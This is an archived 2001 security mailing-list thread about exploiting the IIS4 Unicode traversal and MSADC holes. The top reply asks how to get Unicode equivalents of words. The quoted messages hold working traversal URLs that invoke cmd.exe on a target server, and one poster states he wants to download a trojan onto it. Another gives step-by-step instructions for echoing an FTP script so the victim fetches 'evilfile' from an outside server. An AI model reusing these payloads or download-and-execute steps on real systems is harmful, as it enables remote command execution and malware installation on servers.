Vulnerability Development mailing list archives

Previous By Date Next
Previous By Thread Next

Re: [unicode / iis4]PLEASE HELP ME.

From: Fabrizio Siciliano <fsiciliano () EARTHLINK NET>
Date: Wed, 24 Jan 2001 20:41:52 -0500
Hi everyone...
I've noticed alot of these Unicode-type-of-questions. Sure, send me a flame
if this question was already on the list, but, let's say I have a
word...ummm, "telephone". How do I actually go about finding the unicode
equivalent to that? I've looked for converters, but couldn't find any. Can
anyone help me out there? THANK YOU ALL!
                                                -Fab

#-----Original Message-----
#From: VULN-DEV List [mailto:VULN-DEV () SECURITYFOCUS COM]On Behalf Of Ryan
#Yagatich
#Sent: Tuesday, January 09, 2001 12:47 PM
#To: VULN-DEV () SECURITYFOCUS COM
#Subject: Re: [unicode / iis4]
#
#
#it doesn't matter where the system directory is, or the web directory. (the
#whole point of /msdac)
#let's assume the following:
#
#z:\WINDOWS_NT  <--system root
#u:\internet\web_root <--web root
#since the msdac variant comes from program files\(i don't remember
#exactly)\msdac you can still execute any commands you please no
#matter where
#those directories are
#
#
#
#ryan
#
#
#-----Original Message-----
#From: VULN-DEV List [mailto:VULN-DEV () SECURITYFOCUS COM]On Behalf Of Tim
#H
#Sent: Monday, January 08, 2001 11:00 AM
#To: VULN-DEV () SECURITYFOCUS COM
#Subject: Re: [unicode / iis4]
#
#
#Hi All,
#A lot of these attacks assume that the web directory is on the
#same drive as
#the system and that the system is in the winnt directory.  If neither if
#these conditions are true, is this exploit still reasonable?
#
#Thanks,
#Tim
#
#-----Original Message-----
#From: white hat eagle [mailto:whitehateagle () USA NET]
#Sent: Saturday, January 06, 2001 4:32 PM
#To: VULN-DEV () SECURITYFOCUS COM
#Subject: Re: [unicode / iis4]
#
#
#Hi folks,
#in order to download a file by using mdac.pl or mdac2.pl or iis/unicode
#exploit you should create a file, say, ftptmp.txt and you should issue
#the following command
#ftp -n -s:ftptmp.txt
#where the -n switch will suppress the interactive logon mode and -s switch
#will contain the commands and user credentials.
#and the contents of the ftptmp.txt should be
#open x.x.x.x [or the name of the ftp server]
#user
#anonymous
#me () hacker com
#bin
#get evilfile
#bye
#to create this file you should use the "echo" command and redirect the
#content to the file ftptmp.txt as follows
#echo open x.x.x.x >ftptmp.txt && echo user >>ftptmp.txt.......
#and so on.
#good luck,
#whe-
#
#Mad Zigy <zigy () GLOBAL CO ZA> wrote:
#Well i have been able to use msadc2.pl yet the
#commands i give do not work. so i tried the other way
#by doing
#http://hostname/scripts/..%c0%
#af../winnt/system32/cmd.exe?/c+echo+test+>+c:\test
#.txt
#and all it did was say: The parameter is incorrect.
#so then i though maybe we cant have a > in the string
#so i found the hex of it and tried
#http://hostname/scripts/..%c0%
#af../winnt/system32/cmd.exe?/c+echo+test+%
#3e+c:\test.txt
#yet it still gave me the same: The parameter is
#incorrect.
#I have been able to make it ftp into my pc by
#http://hostname/scripts/..%c0%
#af../winnt/system32/cmd.exe?/c+ftp+hostname
#but i cant make it login as i need to echo a script
#which i can run http://hostname/scripts/..%c0%
#af../winnt/system32/cmd.exe?/c+ftp+-
#s:c:\ftp.txt+hostname so that it will login and
#download the exe / trojan
#Thankz zigy!
#
#
#
#_________________________________________________________________
#Get your FREE download of MSN Explorer at http://explorer.msn.com
#
#
#
Previous By Date Next
Previous By Thread Next

Current thread: